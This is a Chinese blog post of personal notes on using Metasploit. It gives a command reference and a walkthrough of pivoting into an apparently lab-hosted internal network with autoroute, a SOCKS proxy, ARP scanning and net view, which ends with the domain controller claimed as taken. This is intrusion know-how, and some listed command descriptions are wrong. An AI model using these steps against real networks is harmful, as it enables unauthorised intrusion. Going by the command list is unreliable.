8月8日笔记(msf使用)

已于 2024-10-09 21:53:38 修改
阅读量870 收藏 18
点赞数 15
文章标签: 笔记 网络安全
于 2024-08-08 18:12:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74736832/article/details/141033438
版权

8月8日笔记

msf常见命令

启动MSF控制台

  • msfconsole: 启动MSF控制台。
  • msfconsole -h: 显示帮助菜单。
  • msfconsole -q: 启动MSF控制台并立即退出。

导航和管理

  • back: 返回上一级菜单。
  • exit: 退出MSF控制台。
  • banner: 显示MSF的横幅。
  • cd: 更改工作目录。
  • color: 开启或关闭彩色输出。
  • connect: 连接到远程主机(通常用于Meterpreter会话)。
  • help: 显示帮助菜单。
  • info: 显示一个或多个模块的信息。
  • version: 显示MSF版本。

模块管理

  • modules: 显示所有可用的模块。
  • module: 切换到特定模块。
  • use: 选择一个模块进行使用。
  • show: 显示模块的详细信息或配置选项。
  • set: 设置模块的选项。
  • run: 执行选定的模块。
  • exploit: 执行选定的exploit模块。
  • search: 搜索特定的模块。

会话管理

  • sessions: 显示所有活动会话的信息。
  • sessions -l: 列出所有活动会话。
  • sessions -i [SESSION_ID]: 与指定会话交互。
  • sessions -s [SESSION_ID]: 保存指定会话到文件。
  • sessions -u [SESSION_ID]: 更新指定会话的信息。
  • sessions -w [SESSION_ID]: 将指定会话写入到文件。
  • sessions -k [SESSION_ID]: 终止指定会话。
  • background: 将当前会话放到后台。
  • interact [SESSION_ID]: 与指定会话交互。
  • kill: 终止所有会话。

其他命令

  • post: 选择一个后渗透测试模块。
  • resource: 执行一系列MSF命令脚本。
  • script: 执行一个Ruby脚本。
  • history: 显示命令历史记录。
  • history -c: 清除命令历史记录。
  • history -s: 保存命令历史记录到文件。
  • history -l: 加载命令历史记录到文件。

红日靶场(8月8号)

msf与cs连接之后。

为了使msf以外的其它工具也能通过cs反弹的会话进入内网,msf需要建立socks反向代理。(正向代理就是指内网机器如果不能直接连到外网,建立正向代理可以连到外网,而反向代理则相反,是外网主机想要进入内网建立的代理)

新建一个路由

run post/multi/manage/autoroute

在这里插入图片描述

查看一下路由基本情况

在这里插入图片描述

background  #挂起会话
use auxiliary/server/socks_proxy #使用socks代理模块
---------------设置参数
set VERSION 4a
set SRVHOST 127.0.0.1
exploit

在这里插入图片描述

exploit后就会挂起一个job,输入命令查看

jobs

在这里插入图片描述

修改proxychains4.conf中的内容

proxychains4.conf 是 Proxychains 4 的配置文件,这是一个工具,可以让您通过代理服务器来转发网络连接。Proxychains 可以让原本不支持代理设置的应用程序能够通过代理服务器进行网络通信,这对于绕过防火墙、匿名浏览或访问受限资源等场景非常有用。

vim /etc/proxychains4.conf

在这里插入图片描述

这个端口号根据上面那个路由的显示的配置来填写。

arp探测内网存活主机(复现情况下,真实情况下最好不要这么干)

ARP扫描可能会产生大量的广播流量,容易被网络监控系统检测到。

use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1
exploit

在这里插入图片描述

发现内网共存活三台主机。

[+] IP: 192.168.52.138/24
[+] IP: 192.168.52.141/24
[+] IP: 192.168.52.143/24

查看本地网络内的计算机列表:net view

查看主域信息(当前域中的所有可见计算机,包括域控制器和成员工作站):net view /domain

首先要选用刚才我们那个会话:

sessions -i 2 这里的话我的是2
shell  #进入执行计算机页面
net view
net view /domain

在这里插入图片描述

出现局域网内其他主机名。这里使用cs也可以看到其它主机。

在这里插入图片描述

端口扫描之后发现其它的两个ip,点击视图的目标列表

在这里插入图片描述

创建隧道

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

成功拿下主域控制器。

密码小丑
关注
Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload
Kind&红衣的博客
08-13 6612
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年81307:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
813笔记(msf使用补充)
m0_74736832的博客
08-13 768
msf补充使用方法:进入框架:msfconsole使用search命令查找相关漏洞:search ms14-058使用info查看模块信息:info我们也可以将攻击代码写configure.rc(只要是以 .rc 结尾的文件)配置文件中,然后使用命令msfconsole -r configure.rc 进行自动攻击。
87笔记(cs使用
m0_74736832的博客
08-07 195
插件安装:点击load,选择插件。效果:加载系统指令需要在指令之前添加shell。如:shell whoami。
termux 使用笔记
hbh112233abc的博客
01-03 6600
简介 Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby,Go,Nodejs,MySQL等。随着智能设备的普及和性能的不断提升,如今的手机、平板等的硬件标准已达到了初级桌面计算机的硬件标准,用心去打造完全可以把手机变成一个强大的工具. 官网 Github项目地址 Google Pla...
Mac OSX系统下安装metasploit框架软件(MSF
Make
07-31 1645
2016年0115 14:24:39LastTrainHome阅读数 11891标签:Mac OSXmetasploit更多 个人分类:metasploit学习环境配置 最近看《Metasploit渗透测试指南》,第二章开始有具体操作举例,于是准备在电脑上安装MSF终端用于测试。 MSF终端(msfconsole),一种Metasploit框架的用户接口。 首先到官网下载m...
构建之法——现代软件工程 阅读笔记
m0_60308530的博客
03-11 1142
敏捷开发的原则尽早并持续地交付有价值的软件以满足顾客需求。欢迎需求的变化, 并利用这种变化来提高用户的竞争优势。经常发布可用的软件,发布间隔可以从几周到几个,能短则短。业务人员和开发人员在项目开发过程中应该每天共同工作。以有进取心的人为项目核心,充分支持信任他们无论团队内外,面对面的交流始终是最有效的沟通方式可用的软件是衡量项目进展的主要指标:敏捷流程应能保持可持续的发展。领导, 团队和用户应该能按照目前步调持续合作下去。只有不断关注技术和设计才能越来越敏捷.尽可能简化工作量的技艺。
基于Armitage的MSF自动化集成攻击实践
axhc_chentao1981的博客
05-20 2621
基于Armitage的MSF自动化集成攻击实践 目录 0x01 实践环境 0x02 预备知识 0x03 Armitage基础配置 0x04 Nmap:Armitage下信息搜集与漏洞扫描 0x05 Armitage下漏洞自动化攻击实践 5.1 ms08_067_netapi(CVE-2008-4250):Windows远程溢出漏洞自动化攻击 5.2 ms14_064_ole_cod...
渗透测试学习笔记(metasploit)
hklearner的博客
02-21 3418
METASPLOIT exploit-db.com •Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 渗透攻击(exploit) 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。 攻击载荷(payload) 攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的
渗透笔记之HackInOS
若水斋
05-24 3259
首发于独立博客:若水斋。 背景 HackInOS是来自VulnHub的渗透测试靶机,下载地址为https://www.vulnhub.com/entry/hackinos-1,295/#download ,下载下来的是一个OVA格式的虚拟机,可在VMware或VirtualBox中打开。虚拟机已设置DHCP,可自动获取IP。 本文较为完整地记录了我对其进行渗透的全过程,开始时间为2019...
HackTheBox:Cronos笔记
X
04-19 1293
HackTheBox:Cronos笔记 HackTheBox:Cronos WalkthroughHackTheBox:Cronos笔记信息收集NMAP53端口:获得域名80端口:Laravel -> DNS Zone Transfer -> Admin域传送漏洞digNmapnslookup反弹shell提权定时任务反思与总结reference 信息收集 NMAP # nmap...
螣龙安科笔记:内网渗透测试(三)
katekatezzzzz的博客
05-27 1486
经过前两篇文章的介绍,相信大家对于内网渗透测试的一些基础知识已经有了足够的了解,这篇文章就将带你一起来了解内网渗透测试的全过程。 (四)内网渗透流程 1.渗透工具准备 1.1扫描工具 1.1.1主动扫描工具 web应用漏洞扫描器:用于web项目的安全测试工具,扫描网站所有url,自动测试是否存在各种类型的漏洞。如:AWVS、appscan 综合漏洞扫描器:集合了多种功能的漏洞扫描器。如Fux iscanner,具有如下功能:漏洞检测和管理,验证测试程序,IT资产发现和管理,端口扫描器,子域扫描器
[系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
杨秀璋的专栏
03-06 6440
前文分享了MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒,复现了WannaCry勒索病毒。这篇文章作者将继续分析WannaCry勒索病毒,主要通过IDA和OD逆向分析蠕虫传播部分,详细讲解蠕虫是如何感染传播的。同时,由于作者技术真的菜,只能叙述自己摸索的过程,如果存在错误或不足之处,还望告知。希望这篇基础性文章对您有所帮助~
网安工具 | Windows便携式渗透测试环境PentestBox入门到进阶使用指南
WeiyiGeek 唯一极客IT知识分享
09-26 473
描述: PentestBox是一个基于Windows的便携式渗透测试环境, 它基于ConEmu 和 cmder进行设计的。它包含了许多常用的渗透测试工具和应用程序,如等。PentestBox的设计初衷是为了方便渗透测试人员在Windows系统上进行测试,无需进行复杂的安装和配置。它可以直接从USB驱动器或其他便携设备上运行,而不会对主机系统产生任何影响, PentestBox还提供了图形用户界面,使得渗透测试工作更加简单和直观。
贪心算法笔记
qq_45190745的博客
10-15 138
贪心算法笔记
【JasperReports笔记06】JasperReports报表开发之Jasper Studio开发工具中添加自定义字体
✅ Java 开发工程师,从事 Web 应用程序的研发,擅长 Spring、SpringBoot 等技术。 ✅ 热爱编程,业余时间学习新知识,通过 CSDN 记录学习心得和笔记内容。
10-11 122
使用Jasper Studio工具制作报表模板的时候,我们一定会使用到字体文件,常见的字体有:微软雅黑和宋体,但是如果你想添加其他的字体,那么必须要下载字体,然后将其添加到Jasper Studio工具里面,这样才可以在开发开发工具里面使用对应的字体。我们可以在一些字体网站找自己喜欢的字体,然后下载到本地电脑里面,后续就可以开始配置字体路径啦。字体下载_免费字体下载_商用字体设计定制--字魂网字体天下-提供各类字体的免费下载和在线预览服务免费字体下载_免费商用字体_免费字体网_自由字体官网。
《vue leaflet学习实践笔记
最新发布
yk_ddm的博客
10-16 69
目录vue leaflet学习实践笔记 vue leaflet学习实践笔记
PostgreSQL学习笔记十:锁机制详解
软件行业技术文化交流。
10-11 1271
它通过不同级别的锁来控制对数据对象的并发访问,主要包括表级锁、行级锁、页级锁、咨询锁(Advisory Locks)以及死锁(Deadlocks)。咨询锁可以用于实现更细粒度的锁控制,例如,在不同的事务之间同步对特定资源的访问。咨询锁可以是会话级别的或事务级别的,允许用户在不同的进程或事务之间进行协调。:设计事务时,应尽量减少锁的持有时间,并避免长时间运行的事务,因为这会增加死锁的风险。这些锁可以是行级的、事务级的,或者是咨询锁(advisory locks),它们用于控制对表或行的并发访问。
[C++ 核心编程]笔记 5 函数提高
Alex的博客
10-11 436
作用:函数名可以相同,提高复用性同一个作用域下函数名称相同函数参数类型不同 或者 个数不同 或者 顺序不同注意: 函数的返回值不可以作为函数重载的条件//原函数cout
前端学习笔记 --css 黑马程序员3
m0_73805171的博客
10-11 547
文章目录盒子模型盒子的边框边框的复合写法表格的细线边框边框的注意事项paddingpadding的复合属性padding的注意事项marginmargin 让块元素、行内元素、行内块元素实现水平居中margin 外边距合并相邻块元素垂直外边距合并嵌套块元素垂直外边距合并圆角边框圆角边框的使用盒子边框文字阴影浮动浮动的原理与语法浮动的特性--脱标浮动特性--浮动元素一行显示浮动特征--浮动元素具有行内块元素的特性浮动的使用注意事项清除浮动清除浮动的方法清除浮动总结定位相对定位绝对定位固定定位粘性定位定位分类总
kali 的msf怎么使用
03-31
Msf是Metasploit Framework的缩写,是一款开源的网络安全渗透测试工具。...8. 在会话中,可以使用各种命令执行攻击、获取信息等操作。例如“shell”命令可以获取目标主机的shell权限,然后执行各种命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

密码小丑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值